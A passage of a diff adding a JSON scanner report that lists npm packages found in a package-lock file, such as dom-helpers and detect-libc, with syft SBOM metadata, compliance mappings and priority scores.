}, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a7d6bc7c01ff6fdb", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: destroy 1.2.0", + "title": "destroy 1.2.0", + "description": "Package discovered: destroy 1.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "916ee50fe6c61deb", + "name": "destroy", + "version": "1.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:destroy:destroy:1.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/destroy@1.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/destroy/-/destroy-1.2.0.tgz", + "integrity": "sha512-2sJGJTaXIIaR1w4iJSNoN0hnMY7Gpc/n8D4qSCJw8QqFWXf7cuAgnEHxBpweaVcPevC2l3KpjYCx3NypQQgaJg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b1baa34830820f96", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: detect-libc 2.1.2", + "title": "detect-libc 2.1.2", + "description": "Package discovered: detect-libc 2.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "cd3c75639d40cfa6", + "name": "detect-libc", + "version": "2.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:detect-libc:detect-libc:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:detect-libc:detect_libc:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:detect_libc:detect-libc:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:detect_libc:detect_libc:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:detect:detect-libc:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:detect:detect_libc:2.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/detect-libc@2.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/detect-libc/-/detect-libc-2.1.2.tgz", + "integrity": "sha512-Btj2BOOO83o3WyH59e8MgXsxEQVcarkUOpEYrubB0urwnN10yQ364rsiByU11nZlqWYZm05i/of7io4mzihBtQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d9872bdf37f54c1c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: dfa 1.2.0", + "title": "dfa 1.2.0", + "description": "Package discovered: dfa 1.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "32140b01170f2db8", + "name": "dfa", + "version": "1.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:dfa:dfa:1.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/dfa@1.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/dfa/-/dfa-1.2.0.tgz", + "integrity": "sha512-ED3jP8saaweFTjeGX8HQPjeC1YYyZs98jGNZx6IiBvxW7JG5v492kamAQB3m2wop07CvU/RQmzcKr6bgcC5D/Q==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9f98c7e106363761", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: didyoumean 1.2.2", + "title": "didyoumean 1.2.2", + "description": "Package discovered: didyoumean 1.2.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "88295af7ba0997fd", + "name": "didyoumean", + "version": "1.2.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:didyoumean:didyoumean:1.2.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/didyoumean@1.2.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/didyoumean/-/didyoumean-1.2.2.tgz", + "integrity": "sha512-gxtyfqMg7GKyhQmb056K7M3xszy/myH8w+B4RT+QXBQsvAOdc3XymqDDPHx1BgPgsdAA5SIifona89YtRATDzw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "1b1c014679b0d671", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: dijkstrajs 1.0.3", + "title": "dijkstrajs 1.0.3", + "description": "Package discovered: dijkstrajs 1.0.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7a3b023286e84986", + "name": "dijkstrajs", + "version": "1.0.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:dijkstrajs:dijkstrajs:1.0.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/dijkstrajs@1.0.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/dijkstrajs/-/dijkstrajs-1.0.3.tgz", + "integrity": "sha512-qiSlmBq9+BCdCA/L46dw8Uy93mloxsPSbwnm5yrKn2vMPiy8KyAskTF6zuV/j5BMsmOGZDPs7KjU+mjb670kfA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4fdc8b3106066f47", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: dlv 1.1.3", + "title": "dlv 1.1.3", + "description": "Package discovered: dlv 1.1.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "6145214b9f2f7148", + "name": "dlv", + "version": "1.1.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:dlv:dlv:1.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/dlv@1.1.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/dlv/-/dlv-1.1.3.tgz", + "integrity": "sha512-+HlytyjlPKnIG8XuRG8WvmBP8xs8P71y+SKKS6ZXWoEgLuePxtDoUEiH7WkdePWrQ5JBpE6aoVqfZfJUQkjXwA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4d01289dd001e612", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: dom-helpers 5.2.1", + "title": "dom-helpers 5.2.1", + "description": "Package discovered: dom-helpers 5.2.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "22b93db9f5eba040", + "name": "dom-helpers", + "version": "5.2.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:dom-helpers:dom-helpers:5.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:dom-helpers:dom_helpers:5.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:dom_helpers:dom-helpers:5.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:dom_helpers:dom_helpers:5.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:dom:dom-helpers:5.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:dom:dom_helpers:5.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/dom-helpers@5.2.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/dom-helpers/-/dom-helpers-5.2.1.tgz", + "integrity": "sha512-nRCa7CK3VTrM2NmGkIy4cbK7IZlgBE/PYMn55rrXefr5xXDP0LdtfPnblFDoVdcAfslJ7or6iqAUnx0CCGIWQA==", + "dependencies": { + "@babel/runtime": "^7.8.7", + "csstype": "^3.0.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "594471832719edc2", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: dom-serializer 2.0.0", + "title": "dom-serializer 2.0.0", + "description": "Package discovered: dom-serializer 2.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f8e1d8922cf56c54", + "name": "dom-serializer", + "version": "2.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:dom-serializer:dom-serializer:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:dom-serializer:dom_serializer:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:dom_serializer:dom-serializer:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:dom_serializer:dom_serializer:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:dom:dom-serializer:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:dom:dom_serializer:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/dom-serializer@2.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/dom-serializer/-/dom-serializer-2.0.0.tgz", + "integrity": "sha512-wIkAryiqt/nV5EQKqQpo3SToSOV9J0DnbJqwK7Wv/Trc92zIAYZ4FlMu+JPFW1DfGFt81ZTCGgDEabffXeLyJg==", + "dependencies": { + "domelementtype": "^2.3.0", + "domhandler": "^5.0.2", + "entities": "^4.2.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "04fd13748534548d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: domelementtype 2.3.0", + "title": "domelementtype 2.3.0", + "description": "Package discovered: domelementtype 2.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "5df6e95fb09fce0c", + "name": "domelementtype", + "version": "2.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-2-Clause", + "spdxExpression": "BSD-2-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:domelementtype:domelementtype:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/domelementtype@2.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/domelementtype/-/domelementtype-2.3.0.tgz", + "integrity": "sha512-OLETBj6w0OsagBwdXnPdN0cnMfF9opN69co+7ZrbfPGrdpPVNBUj02spi6B1N7wChLQiPn4CSH/zJvXw56gmHw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + 